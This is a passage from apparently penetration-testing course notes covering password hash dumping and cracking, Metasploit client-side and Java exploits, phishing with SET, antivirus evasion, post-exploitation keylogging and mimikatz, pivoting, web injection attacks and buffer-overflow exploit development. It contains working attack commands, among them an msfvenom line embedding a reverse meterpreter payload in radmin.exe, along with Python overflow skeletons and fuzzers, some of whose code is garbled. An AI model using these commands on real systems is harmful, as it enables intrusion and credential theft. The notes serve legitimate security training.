● > mount -t nfs -o nolock [ip.address.of.server]:/path/to/shared/directory /mountpoint -
Allows the mounting of a remote NFS server's file share.
● > ssh-add - Adds the ssh private and public keys in the .ssh directory to the user's
identity.
● > ssh -i /path/to/private.key [email protected] - Allows a user to access ssh
using a private key without using ssh-add to attach the key to the user's identity. The
private key must be set to the correct permissions using 'chmod 600 private.key'.

● Two excellent Windows post-exploitation frameworks that play well with metasploit are
Powershell Empire (https://www.powershellempire.com/) and Nishang
(https://github.com/samratashok/nishang.git).
● In addition to the webshells covered, Weevely (https://github.com/epinna/weevely3) is an
advanced php webshell that boasts the robustness of a typical tcp/udp reverse shell with
several utilities that makes post-exploitation much easier.
Module 8: Passwords
Lesson 8.1: Passwords (Part 1) Password Attacks

Skills Learned From This Lesson: Password Hash-dumping, Client-side Attacks, Windows
Permissions Bypass
● > bkhive - A linux command line utility used to extract syskeys from system files.
● > samdump2 - Used in conjunction with bkhive to extract the password hashes for user
account from an unlocked SAM file.
● A live CD/USB of any Linux distro can be booted onto a machine to mount the machine's
hard drive and bypass the file permissions on that drive.



23

● The SAM can be found at \System32\config\SAM
Lesson 8.2: Passwords (Part 2) Online Password Cracking

Skills Learned From This Lesson: Password Cracking, Hydra
● thc-hydra - A parallelized login cracker that supports numerous protocols. Causes a lot
of 'noise' on a network as the attacker's IP will register sometimes hundreds of login
attempts. Can get an attacker's IP/MAC address banned.
Lesson 8.3: Passwords (Part 3) Offline Password Attacks

Skills Learned From This Lesson: John the Ripper, LM/NTLM Hash Cracking, Windows SAM
● John (the Ripper) - Password cracking software programmed in C.
○ > 'john --format=nt windowshashes.txt --wordlist=passwords.txt' - Command that
uses John to crack the hashes in windowshashes.txt using the passwords.txt
wordlist.
○ John the Ripper has comes with it's own password wordlist that can be used for
cracking.
● LM Hash - Password hashing function of Microsoft LAN Manager and Windows prior to
Windows NT. Has since been compromised and deprecated.
● NTLM Hash - Password hashing function designed as the successor to LM Hash.
Several vulnerabilities have been found in the protocol and most 8 character passwords
can be cracked in 2.5 hours using modern hardware.
● Structure of hashed credentials recovered from Windows SAM
○ > (Username):(UserID):(LMhash):(NTLMhash)
Lesson 8.4: Passwords (Part 4) Using Hashcat

Skills Learned From This Lesson: Hashcat, ‘rockyou’ Wordlist, Pipal
● Hashcat - Password cracking recovery tool. Uses GPU acceleration to crack password
hashes. CPU-based password cracking can be found in hashcat-legacy
ttp://github.com/hashcat/hashcat-legacy)
(h
○ > hashcat -m (mode) hashes.txt -o crackedpassswords.txt
/path/to/desired/wordlist.txt
○ When cracking NM/NTLM hashes in hashcat, the hashes.txt file can only contain
the hashes that need to be cracked. Any other fields and delimiters need to be
removed (cut -d ':' -f 4 hashes.txt >> hashescleaned.txt).



24

● The hash mode must be specified when using hashcat. 'hashcat --help' will bring up a list
of the hash modes, amongst other bits of informative data.
● The 'rockyou.txt' wordlist is a massive wordlist filled with recovered passwords from data
breaches concatenated into the same file. Can be found in its compressed state in a Kali
Linux installation by default in the '/usr/share/wordlists/' directory.
● Using rules in Hashcat will define permutations that will be applied to the wordlist. These
rules can be found in '/usr/share/hashcat/rules' and additional rules can be utilized as
well.
● John the Ripper can also be used as a utility to identify the hashing algorithm of a
password hash.
● Some password hashes can be put into google to find the corresponding passwords or
online password cracking utilities can be utilized.
● > pipal - Tool for password analysis and statistics.

● Several handy wordlists for password cracking can be found in the FuzzDB Github
Repository (https://github.com/fuzzdb-project/fuzzdb), the Seclists Repository
(https://github.com/danielmiessler/SecLists) as well as searching through Pastebin for
recent password breach dumps (https://pastebin.com/).
Module 9: Advanced Exploitation
Lesson 9.1: Advanced Exploitation (Part 1) Introduction

Lesson 9.2: Advanced Exploitation (Part 2) Client Side Attacks

Skills Learned From This Lesson: IE Exploitation, Meterpreter Session Migration, Client-Side
Attacks
● Client Side Attacks are utilized by setting up a server to listen for incoming connections
and targeting any program that can open files (Office software, media players, etc.) to
return a connection to the listening server.
● msf exploit(ms10_002_aurora) - A metasploit module created to exploit ms10_002, a
memory corruption flaw in Internet Explorer.



25

○ This exploit creates a webserver on the specified SRVPORT and hosts the
exploit in the directory specified at URIPATH. From there the target must browse
to the hosted payload with the appropriate web browser (Internet Explorer in this
case) to trigger the exploit. Until then Metasploit will remain in a listening state
while serving the exploit.
● meterpreter > migrate process # - Migrates the meterpreter session to a windows
process that has gives the attacker a more advantageous and/or session environment
with the target's machine.
● Exploits like these can be chained with attacks such as social-engineering attacks or
DNS cache poisoning to get the target to browse to the server hosting the exploit.
● A meterpreter script can be set in the AutoRunScript option to spawn a new process
following a Client-Side Attack.
● PrependMigrate is another option that, if set to true, will automatically spawn and run
shellcode in a new process prior to creating a meterpreter session.
Lesson 9.3: Advanced Exploitation (Part 3) Exploiting Java

Skills Learned From This Lesson: Browser Exploitation, Java Payloads, Meterpreter and Java
● In Metasploit, a platform agnostic java applet can be created using the
exploit/multi/browser/java_signed_applet module that when executed will return a
meterpreter session to the attacker.
● A java certificate can also be used to sign the malicious java applet to convince the
target of its legitimacy.
● Since this a java-based exploit, an appropriate payload should also be selected (e.g.
java/meterpreter/reverse_tcp).
● Java-based meterpreter sessions have additional restrictions that must be circumvented
to do things like hashdumps.
Lesson 9.4: Advanced Exploitation (Part 4) Social Engineering

Skills Learned From This Lesson: Social Engineering Toolkit, Website Cloning, Email Phishing
● Social Engineering techniques range from cold-calling for information and piggybacking
into facilities (not requiring much technical skill) to launching phishing campaigns with
malicious file downloads and cloned websites (requiring more technical aptitude).
● Social Engineering Toolkit (SET) - A sophisticated framework with a litany of tools and
exploits centered around launching social engineering attacks against targets



26

(https://github.com/trustedsec/social-engineer-toolkit and included in Kali Linux). Its

features include:
○ Spear-Phishing Attacks
○ Website Attacks
○ Malicious Media Generator
○ Mass Mailer
○ Metasploit Interfaced Payloads and Listeners
○ Arduino-Based Attacks
○ SMS Spoofing
○ Wireless Access Point Attacks
○ QR Code Generator
○ Powershell-based Attacks
● The Mass Mailer in SET can be used in conjunction with a list of email addresses to
launch a mass phishing email attack to the specified targets. The details in the title and
body of the message can also be customized and tuned for specific Social Engineering
campaigns.
● Some popular email providers (e.g. GMail) will most likely (and hopefully) have
email-attachment inspection safeguards built in to protect their users against some of the
email-based social engineering attacks in the Social Engineering Toolkit.
● SET has the ability to interface with msfcli to create payloads to use with Meterpreter.
● After a target submits her credentials into the SET-cloned website, the credentials are
logged and the user is redirected to the legitimate website's login page.
● In addition to the aforementioned attacks, malicious payloads can also be planted on
USB Drives, CD/DVDs and other removable storage devices then dropped in areas with
regular traffic where potential targets will hopefully take the item and insert it into their
device(s).
Lesson 9.5: Advanced Exploitation (Part 5) Bypassing Antivirus Software

Skills Learned From This Lesson: msfvenom AV-bypass, Hyperion, .exe-embedded payloads
● > msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.77 LPORT=1234 -x
radmin.exe -k -f exe > radmin.exe - msfvenom one-liner that embeds a meterpreter
payload into a windows executable (-x) that will run the payload in a different thread
upon execution (-k).



27

● An alternative to serving payloads on apache2 web servers is using the

SimpleHTTPServer python module
(https://docs.python.org/2/library/simplehttpserver.html).
● Hyperion - A cryptographic tool used to encrypt malicious files as a method of bypassing
antivirus. The malicious file will brute-force it's own encryption key to decrypt itself on the
target machine and execute its payload (this process could take some time).
● Veil - Generates Metasploit payloads suited to bypass popular AV analysis
(https://github.com/Veil-Framework/Veil)
● A more reliable method of bypassing AV is to eschew metasploit/meterpreter and to
build custom tools that take advantage of the operating system's api to communicate
with the target's machine (as most non-malicious software does).
Module 10: Post-Exploitation
Lesson 10.1: P ost-Exploitation (Part 1) File Transfer without an Interactive Shell

Skills Learned From This Lesson: Local Privilege Escalation, Metasploit Post- Exploitation,
Public Exploits
● Meterpreter Scripts - Ruby-based scripts that run within meterpreter sessions. Can be
found in the /usr/share/metasploit-framework/scripts/meterpreter directory on Kali Linux.
● Post-Exploitation (Post) Metasploit Modules - Modules tailored for use after an initial
foothold is achieved. Used for techniques such as pivoting, privilege escalation and data
gathering/exfiltration.
● meterpreter > getuid - Displays the macnine_name\username for the account that
meterpreter is running as.
● meterpreter > getsystem - Attempts privilege escalation for the meterpreter session. Is
dependent upon the UID of the meterpreter session having some level of administrative
privileges. User Access Controls (UAC) is a more modern advancement that prevents
the getsystem command.
● msf > exploit/windows/local/bypassuac - Module that allows the bypass of Windows User
Access Controls.
● meterpreter > upload /path/to/file C:\\ - Upload a file to a target via a meterpreter shell.
● meterpreter > background - Backgrounds the current meterpreter session.



28

● msf > post/multi/recon/local_exploit_suggester - This Module can be used on a

backgrounded meterpreter session to allow metasploit to soft-scan the target and
suggest possible exploits for privilege escalation. By default meterpreter sessions open
in x86. Migrating the meterpreter session to an x64 process and rerunning this module
should be done to give obtain a full assessment of applicable privilege escalation
modules.
● > searchsploit - A local repository of exploits from www.exploit-db.com. Installed by
default on Kali Linux.
● > lsb_release -a - Displays general system information on a Debian-based Linux
Machine.
● > ps aux - Displays a detailed list of currently active processes on a linux system.
Lesson 10.2: ( Part 2) Using Metasploit

Skills Learned From This Lesson: Token Impersonation, Mimikatz, Keystroke Sniffing
● msf > post/windows/gather - Information gathering and enumeration modules.
● meterpreter > search -f filename.txt - Searches the compromised machine for a file
matching the submitted pattern. Use wildcards (*) to broaden the range of the search.
● meterpreter > keyscan_start - Enables the keystroke sniffer functionality built into
meterpreter.
● meterpreter > keyscan_dump - Prints the captured keystrokes to the terminal window.
● meterpreter > keyscan_stop - Disables keystroke sniffing.
○ Keystrokes capture is partially dependent upon which process meterpreter is
running as. For instance, if the attacker migrates the meterpreter session to
winlogon.exe, she will increase her chances of capturing login credentials.
● After compromising a process using a web-based exploit (PHP or Java), the subsequent
meterpreter session will typically be restricted in its capabilities. A way to overcome this
is to use any recovered credentials in conjunction with a TCP based exploit (e.g.
MS08-067) to obtain a tcp meterpreter session with less or no restrictions. Some of
these exploits may even, by default, spawn with NT AUTHORITY\SYSTEM privileges.
● meterpreter > incognito - Functionality in meterpreter that allows the attacker to
impersonate the token of another user and thus gain that user's privileges.



29

○ meterpreter > list_tokens -u - List all the tokens of logged in users available for
token impersonation.
○ meterpreter > impersonate_token COMPUTER\\USERNAME - Attempts to
impersonate the specified user on the system.
○ meterpreter > rev2self - Reverts to the original uid of the meterpreter session.
○ meterpreter > load mimikatz - Loads the mimikatz extension into the meterpreter
session.
○ meterpreter > kerberos - Pulls plaintext passwords from memory using mimikatz.
● pass-the-hash - An attack that allows an attacker to authenticate to a remote server or
service by using the underlying NTLM or LanMan hash of a user's password instead of
the plaintext password itself.
Lesson 10.3: ( Part 3) Pivoting

Skills Learned From This Lesson: Metasploit Routing, Metasploit Proxy Server, Proxychains
● msf > route add (network_ip_address) (subnet_mask) (session_id) - Adds a network
route through a compromised host to enable the scanning, enumeration and possible
exploitation of hosts on other networks that would be otherwise inaccessible.
● msf > auxiliary/server/socks4a - Starts a socks proxy server and gives the ability to route
network traffic (using proxychains) of other tools into metasploit and any routes that may
be setup within.
● When pivoting, it'll be necessary to use a bind shell to exploit additional systems as a
reverse shell will not be aware of the route used during pivoting.
● > proxychains - A utility in Linux that allows CLI tools to have their traffic routed to a
proxy server as defined in the /etc/proxychains.conf file.
● When enumerating a linux system during post-exploitation, checking the contents of the
~/.bash_history file could reveal cleartext passwords that were accidentally typed directly
into the terminal and other clues that could assist in post-exploitative processes.
Lesson 10.4: ( Part 4) Setting up a Domain Controller (Rename to “Domain Controller

Exploitation”)
Skills Learned From This Lesson: smbexec, Responder, Domain Controllers
● SMBexec - A psexec style attack using SMB (Samba) as an attack vector.
● Responder - Responder is an LLMNR, NBT-NS and MDNS poisoner, with built-in
HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting



30

NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication.

Assists with credential capturing with an emphasis on stealth.
● Domain Controller - a server that responds to security authentication requests (logging
in, checking permissions, etc.) within a Windows Domain
● Domain Administrator - Administrative account level privileges that gives the account
Admin rights for an entire domain and all the devices within it. See "God Mode".

● A few tools that may help in gathering information on a Linux system for privilege
escalation are Lynis (http://cisofy.com/lynis), LinEnum
(https://github.com/rebootuser/LinEnum) and Linux Exploit Suggester
(https://mzet-/linux-exploit-suggester).
● When using proxychains, if editing the /etc/proxychains.conf file is undesirable, a copy of
this file can be made and placed in the current working directory and edited to the
necessary specifications. Proxychains' default path is set to look for a proxychains.conf
file in the current working directory before using the /etc/proxychains.conf config file.
● Two other tools not previously mentioned that assist in gathering information and
credentials in conjunction with Domain Controllers and Active Directory are Impacket
(https://github.com/SecureAuthCorp/impacket) and Bloodhound
(http://github.com/BloodHoundAD/BloodHound).
● Since maintaining persistence is an essential part of the Post-Exploitation phase of
penetration testing, it may be worthwhile to research a few Command and Control (C2)
frameworks to facilitate this. Two that come to mind is Merlin, an open-source C2
framework based around using HTTP/2 for communication, and Cobalt Strike, a robust
commercial C2 Framework and Adversary Simulation tool.
● For more information on specific tactics used by known Advanced Persistent Threat
(APT) Actors, it's worth bookmarking and studying MITRE's ATT&CK Matrix
ttps://attack.mitre.org/).
(h
Module 11: WebApps



31

ebApp Introduction (Part 1) Web App Testing

Lesson 11.1: W
Lesson 11.2: W ebApp (Part 2) Vulnerable Web Applications

Skills Learned From This Lesson: DVWA, Burp Suite, HTTP Requests
● Damn Vulnerable Web Application (DVWA) - A Web Application based on PHP/MySQL
designed to be intentionally vulnerable and used to practice web application testing
(https://github.com/ethicalhack3r/DVWA)
● OWASP Webgoat - A deliberately insecure Java web application, designed by OWASP
(https://github.com/WebGoat/WebGoat)
● Though there are many web application scanners out there, to mitigate being lead astray
by false positives or the scanner itself missing vulnerability in custom web applications, it
is recommended to manually test web applications.
● Portswigger Burp Suite - A java-based web application penetration testing proxy and
scanner (Pro Version only). Requests going to the server from the browser can be
captured, modified en-route and passed along to analyze the programming logic of a
web application and test how the application will respond to unexpected input from the
attacker.
○ Burp Intruder - A fuzzer built into Burp Suite.
○ Burp Decoder - Decodes encoded strings (e.g. Base64) in Burp Suite.
○ Burp Repeater - requests captured in the web proxy can be sent to Repeater to
be inspected, edited and repeated to test the behavior of the web application.
○ Burp Comparer - Compares 2 requests and notes their differences.
○ Burp Spider - Web crawler built into Burp Suite.
○ Burp Extender - Allows the installation of custom plugins to extend the
functionality of Burp Suite.
○ Burp Scanner - Automated passive and active scanner that scans a Web
Application according to a set of predefined definitions. Very noisy.
○ Burp Sequencer - Used for analyzing the amount of randomness in a sample
text. Used to test SESSIONIDs, Authentication Tokens, etc.
● HTTP Request Methods - Verbs that indicate the desired action to be performed for a
given resource.



32

○ GET - Requests a representation of the specified resource. Requests using GET

should only retrieve data.
○ POST - Used to submit an entity to the specified resource, often causing a
change in state or side effects on the server.
○ PUT - Replaces all current representations of the target resource with the request
payload.
○ DELETE - Deletes the specified resource.
○ HEAD - Asks for a response identical to that of a GET request, but without the
response body.
○ OPTIONS - Asks the server the available request methods that can be used
during communication.
○ CONNECT - Establishes a tunnel to the server identified by the target resource.
○ TRACE - Performs a message loop-back test along the path to the target
resource.
○ PATCH - Used to apply partial modifications to a resource.
● HTTP Header - Allow the client and the server to pass additional information with the
request or the response. An HTTP header consists of its case-insensitive name followed
by a colon ':', then by its value (without line breaks). Leading white space before the
value is ignored.
● Web Crawler (spider) - A bot designed to systematically browse all webpages on a site
(or the Internet in the case of Google/Bing/etc.). These are typically integrated into most
modern WebApp Pentesting Proxies but should be used with caution.
● robots.txt - A document hosted on a web application designed to tell web crawlers which
pages and directories to omit from it's crawling. Web App Pentesting Proxies typically
ignore these instructions. This file could be used to find sensitive web pages/directories
that may have vulnerabilities or information to assist in finding vulnerabilities.
ebApp (Part 3) SQL Injection

Lesson 11.3: W
Skills Learned From This Lesson: Injection Attacks, SQL Injection, SQLMap
● SQL Injection - Attacks a web application by injecting SQL into vulnerable input fields in
attempts at getting the backend database to respond with Personally Identifiable
Information (PII) or other sensitive information.



33

● IFrame Injection - An attack of one or more <iframe> </iframe> tags that have been
inserted into a page or post’s content and typically downloads an executable program or
conducts other actions that compromise the site visitors’ computers.
● LDAP Injection - Used to exploit web applications which could reveal sensitive user
information or modify information represented in the LDAP (Lightweight Directory Access
Protocol) data stores. Can be used similarly to SQL Injection.
● Seeing "?id=" in the url of a web page is a sign that the site may be vulnerable to SQL
Injection.
● Putting a single quote ' at the end of a possible injection point acts as an escape and
could cause the page to error or behave unexpectedly, a sign the application is
vulnerable.
● The syntax of a SQL Injection may need to be modified to fit the type of backend
database being used on the server.
● Putting -- into a SQL Injection point will comment out the remainder of the intended SQL
query and only run the query submitted by the attacker.
● Salt - "Random" data put into the hashing of a password to help safeguard the password
from password cracking in the case of a breach.
● SQLMap - An open source penetration testing tool that automates the process of
detecting and exploiting SQL injection flaws and taking over of database servers.
○ sqlmap ... --os-shell - SQLMap will attempt to get a command shell using
injection attacks against the database.
● XPath Injection - Similar to SQL Injection, XPath Injection attacks occur when a website
uses user-supplied information to construct an XPath query for XML data. By sending
intentionally malformed information into the web site, an attacker can find out how the
XML data is structured, or access data that he may not normally have access to. He may
even be able to elevate his privileges on the web site if the XML data is being used for
authentication (such as an XML based user file).
ebApp (Part 4) File Inclusion

Lesson 11.4: W
Skills Learned From This Lesson: LFI, RFI, Command Execution
● Local File Inclusion - The process of including files, that are already locally present on
the server, through the exploitation of vulnerable inclusion procedures implemented in
the application.



34

● Remote File Inclusion - The process of including remote files through the exploitation of
vulnerable inclusion procedures implemented in the application.
● Command Execution - Attacks a web application by defeating the parsing logic of an
input field filter (if there is one) and sending commands to an operating system level
program thereby gaining unintended control of that program, and the system as a whole.
● During command injection attacks, understanding the underlying operating system is
essential to knowing which escapes/return operators will give the desired results. An
example is in Linux putting '&&' after the intended input of a command execution point
will run the expected command and also run a command submitted by the attacker, such
as 'cat /etc/passwd'.
Lesson 11.5: W ebApp (Part 5) Cross Site Scripting

Skills Learned From This Lesson: CSRF, BeEF, OWASP Top 10
● Javascript - lightweight interpreted (like Python, unlike C which needs to be
pre-compiled) programming language used as a scripting language for Web pages and
many non-browser environments such as Node.js, Apache, CouchDB, Electron and
Adobe Acrobat.
● Cross Site Scripting (XSS) - XSS attacks occur when an attacker uses a web application
to send malicious Javascript to a different end user. Stored XSS will be stored on the
server (usually in the form of comments) and Reflected XSS is passed in as a request
parameter and the site renders the Javascript on the page.
● Cross Site Request Forgery (CSRF) - An attack that forces an end user to execute
unwanted actions on a web application in which they're currently authenticated.
● From the perspective of a security conscious developer, all user data should be
untrusted and properly filtered. As a penetration tester, then, we should make sure to
test all fields where users can input data, upload files, etc to check for possible
vulnerabilities.
● The Browser Exploitation Framework (https://beefproject.com/) - A penetration testing
tool that focuses on the web browser. BeEF will hook one or more web browsers and
use them as beachheads for the launching of directed command modules and further
attacks against the system from within the browser context.
● The OWASP Top 10 is a list of the Top 10 critical web application security risks. Last
revised in 2017 and is a critical document to read and understand to be successful in



35

Web Application Penetration Testing

(https://www.owasp.org/images/7/72/OWASP_Top_10-2017_%28en%29.pdf.pdf).
Teaching Assistant Extra Credits

● Browser extensions like FoxyProxy may assist in quickly configuring a web browser to
route traffic through http proxies for WebApp testing.
● The Mozilla Foundation has a wealth of information about the standard web technologies
encountered in the wild that should be studied and understood to be successful in the
testing of Web Applications (https://developer.mozilla.org/en-US/docs/Web/)
● An alternative to Burp Suite is OWASP Zed Attack Proxy, a free Web Application Testing
proxy. Has all the same functionality and is free.
● Browser extensions like BuiltWith and Wappalyzer are essential to Web Application
Penetration testing as they give a quick glimpse into the technologies being used on a
web application.
● NOSQLMap - A automated tool for the exploitation of non-relational databases such as
MongoDB and CouchDB (https://github.com/codingo/NoSQLMap).
● An excellent publicly facing source of Web Payloads can be found at the
PayloadAllTheThings Repository hosted on GitHub
ttps://github.com/swisskyrepo/PayloadAllTheThings).
(h
Module 12: Exploit Development
xploit Development Introduction (Part 1)

Lesson 12.1: E
Lesson 12.2: E xploit Development (Part 2) A Program in Memory

Skills Learned From This Lesson: Stack Theory, Buffer Overflows, x86 Registers
● Buffer Overflow - An anomaly where a program, while writing data to a memory buffer,
overruns the buffer's boundary and overwrites adjacent memory locations.
● Stack - Regions of memory where data is added or removed in a last-in-first-out (LIFO)
manner. PUSH instruction puts data on the stack, POP instruction removes data from
the stack.



36

● Register - A quickly accessible location available to a CPU usually consisting of a small

amount of fast storage.
● x86 General Purpose Registers
○ IP/EIP/RIP: Instruction pointer. Holds the program counter, the address of the
next instruction.
○ SP/ESP/RSP: Stack pointer for top address of the stack.
○ BP/EBP/RBP: Stack base pointer for holding the address of the current stack
frame.
○ SI/ESI/RSI: Source index for string operations.
○ DI/EDI/RDI: Destination index for string operations.
○ AL/AH/AX/EAX/RAX: Accumulator
○ BL/BH/BX/EBX/RBX: Base index (for use with arrays)
○ CL/CH/CX/ECX/RCX: Counter (for use with loops and strings)
○ DL/DH/DX/EDX/RDX: Extend the precision of the accumulator (e.g. combine
32-bit EAX and EDX for 64-bit integer operations in 32-bit code)
xploit Development (Part 3) Stack Frame for Function

Lesson 12.3: E
Skills Learned From This Lesson: Buffer Overflow Exploitation, Vulnerable C Functions
● In C, argv[0] is the name of the program itself. All other subsequent command line
arguments are numbered starting with 1.
● strcpy - a function that does no bounds checking when writing to memory. This could
cause a function to continue writing to adjacent memory outside the buffer, past the
stack frame and possibly to the bottom of the stack.
● char buffer[] - Specifies the character size of the buffer.
Lesson 12.4: E xploit Development (Part 4) GNU Compiler

Skills Learned From This Lesson: Debugging, Assembly, Hex Codes
● GNU C Compiler (gcc) - Default C compiler found in Linux.
○ > gcc -g -fno-stack-protector -o "output_filename" "input.c" - Compiles input.c
with a debugger flag set and with canary disabled.
● Canaries - Known values placed between a buffer and control data on the stack to
monitor buffer overflows. Upon the overwriting of the canary value during a buffer
overflow attempt, the system will be notified when that value is not verified and will
handle the data appropriately.



37

● Segmentation Fault - A fault raised by hardware with memory protection, notifying an

operating system (OS) about a memory access violation.
● GDB - GNU Debugger, used by default in Linux.
○ (gdb) list (firstline#),(lastline#) - Prints the lines of code in the boundaries
specified.
○ (gdb) break (line#) - Sets a breakpoint at the specified line
○ (gdb) run (arguments) - Runs the program with the specified arguments in the
debugger.
○ (gdb) disassemble - Produces the assembly output of a function.
○ (gdb) set disassembly-flavor - Changes the assembly format.
○ (gdb) info registers - Prints all registers and their accompanied data values in
Hexadecimal to the screen.
● Breakpoint - Marks a point in code where execution will pause.
● Hexadecimal - A positional numeral system with a base of 16. It uses sixteen distinct
symbols, most often the symbols 0–9 to represent values zero to nine, and A–F to
represent values ten to fifteen.
● https://www.asciitable.com/
● Using a long series of A's or any other character in the argument field and looking for a
segmentation fault is a great way to test if a binary is vulnerable to a buffer overflow.
Lesson 12.5: E xploit Development (Part 5) Python

Skills Learned From This Lesson: Return Address, Python Scripting, Exploit Development
● In Hexadecimal, two characters = one byte.
● By overwriting the return address during a buffer overflow exploit, the attacker can then
specify an executable place in memory the program should return to and continue after
the execution of the exploited function is completed. If the specified return address does
not refer to an executable place in memory, a segmentation fault will occur.
● It's a good idea to use a scripting language to print a series of characters (Several 'A's
followed by several 'B's, etc.) to trace the key data areas essential for exploitation.
xploit Development (Part 6) Executing Unintended Code

Lesson 12.6: E
Skills Learned From This Lesson: Little-Endianness, Big-Endianness, Buffer Overflow Exploit
● To execute unintended code during a buffer overflow exploit, fill the argument with
enough arbitrary data to overwrite memory up until the return address, then input the hex



38

value for the desired address in memory with executable data. Execution will return to
this point and execute the code present.
● Endianness - The sequential order in which bytes are arranged into larger numerical
values when stored in memory or when transmitted over digital links. Intel
microarchitecture is little-endian while the IBM System/360 is Big-endian.
○ Big-endianness - 123456
○ Little-endianness - 654321
● The endianness of the target system should be considered when developing a buffer
overflow exploit.
Lesson 12.7: E xploit Development (Part 7) Network Based Exploits and Debuggers
Skills Learned From This Lesson: Network Buffer Overflow, Immunity Debugger, WarFTP
Exploitation
● Immunity Debugger - A debugger developed for the Windows Platform. This debugger
can be attached to a running service or program to program to analyze its execution in
real time. Some programs also allow Immunity to manage its state.
● For network-based exploit development, a script can be created in your preferred
scripting language to open a socket and submit a test string (usually consisting of 'A's)
into any of the available input fields to test for buffer overflow vulnerabilities. The results
can be seen if a debugger has been set to analyze and log execution on the target host.
● WarFTP Daemon - A free FTP server for Windows.
● > warftpskel.py
○ #!/usr/bin/python
○ import socket
○ buffer = "A" * 1100
○ s=socket.socket(socket.AF AF_INET,socket.SOCK_STREAM)
○ connect=s.connect(('192.168.5.44',21))
○ response = s.recv(1024)
○ print response
○ s.send('USER' + buffer + '\r\n')
○ print responsible
○ s.send('PASS PASSWORD\r\n')
○ s.close()



39

Lesson 12.8: E xploit Development (Part 8) Creating a Cyclic Pattern

Skills Learned From This Lesson: Cyclic Patterns, !Mona, Memory Corruption Preventions
● mona - A PyCommand for Immunity Debugger that assists with creating exploit
shellcode for Metasploit.
● > !mona pattern_create 1100 - Creates a 1100 character cyclic pattern.
● > !mona findmsp - Tells mona to search for the generated cyclic pattern loaded in
memory. Doing this assists with mapping the registers' memory addresses.
● A cyclic pattern can be generated with mona and injected into a buffer overflow
vulnerable program to help map the return address easier.
● DLL Rebase - When the windows operating system has to push a dll into memory at an
address other than it's preferred base because another DLL is already loaded in that
location.
● Address Space Layout Randomization (ASLR) - A technique used in memory corruption
prevention that involves randomizing the address of key data areas on the stack that an
attacker would normally target with memory corruption attacks. Introduced into Windows
in Windows Vista.
● Data Execution Prevention - Marks sections of memory as non-executable as a
mitigation against buffer overflow exploitation.
xploit Development (Part 9) Verifying Offsets

Lesson 12.9: E
Skills Learned From This Lesson: Bad Characters, 'jmp' Function , Locating Functions
● After using a tool like mona to map the offsets of the registers, it's best practice to
manually verify the validity of this data.
● > warftpskel.py
○ import socket
○ # buffer = "A" * 1100
○ buffer = "A" * 485 + "B" * 4 + "C" *4
○ buffer += "D" * (1100 - len(buffer))
○ s=socket.socket(socket.AF AF_INET,socket.SOCK_STREAM)
○ connect=s.connect(('192.168.5.44',21))
○ print response



40

○ s.send('USER' + buffer + '\r\n')

○ print response
○ s.send('PASS PASSWORD\r\n')
○ s.close()
● Encountering a bad character when developing exploits will discard or render useless
any following exploit code. These characters can usually be found when following the
specification for the protocol and how the data is being interpreted by the program. Be
sure to always identify bad characters for the protocol you're working with and make
sure the exploit is free of them
● Since hard coding register addresses in an exploit will make the exploit more unstable.
Its better practice to use a function such as 'jmp' to get to the register's address.
● > !mona jmp -r esp -cpb '\x00\x0a\x0d\x40' - Mona/Immunity will locate the 'jmp's for the
esp register and specifies \x00, \x0a, \x0d and \x40 as bad characters.
Lesson 12.10: E xploit Development (Part 10) Creating Shell Code in Kali Linux
Skills Learned From This Lesson: Generating Shellcode, Exploit Debugging, OpCodes
Generation
● > msfvenom -p windows/shell_bind_tcp -b '\x00\x0a\x0d\x40' -s 607 -f py - Creates a
Bind TCP payload excluding the specified bad characters in a python format and prints it
to the screen. Will, by default, encode the payload with Shikata Ga Nai.
● Shikata Ga Nai is a polymorphic encoding and will most likely encode the same data
differently.
● Encoding a payload can sometimes cause corruption of the payload in memory during
the decoding phase. Debugging the payload and adjusting the position of registers may
assist in dialing in an in-development exploit.
● Metasm - A ruby based assembler / disassembler / compiler. Can be used to easily
create Op-Codes from assembly. Can be found by default in
/usr/share/metasploit-framework/tools/metasm_shell.rb on Kali Linux.
(https://github.com/jjyg/metasm)
xploit Development (Part 11) Fuzzing

Lesson 12.11: E
Skills Learned From This Lesson: Fuzzing, Python Programming, Buffer Overflow Methodology



41

● Fuzzing - Automated software testing technique that involves providing invalid,

unexpected or random data as inputs to a program.
● > 3comfuzzer.py
○ import socket
○ bufferarray = ["A"*100]
○ addition = 200
○ while len(bufferarray) <= 50;
○ bufferarray.append("A"*addition)
○ addition += 100
○ for value in bufferarray;
○ tftppacket = "\x00\x02" + "Georgia" + "x00" + value + "\x00"
○ print "Fuzzing with length " + str(len(value))
○ s=socket.socket(socket.AF_NET, socket.SOCK_DGRAM)
○ s.sendto(tftppacket,("ip.address.of.target",69))
○ response = s.recvfrom(2048)
○ print response
● Buffer Overflow Exploit Development Methodology
○ Create fuzzing script to find how many characters are required to trigger a
memory access violation
○ Verify in debugger
○ !mona pattern_create 500 #Create a cyclic pattern
○ !mona findmsp #Find the offset to EIP and the offset to ESI
○ !mona jmp -r esi -cpb 'bad,characters,here' #Find a jmp or equivalent function to
get to ESI register
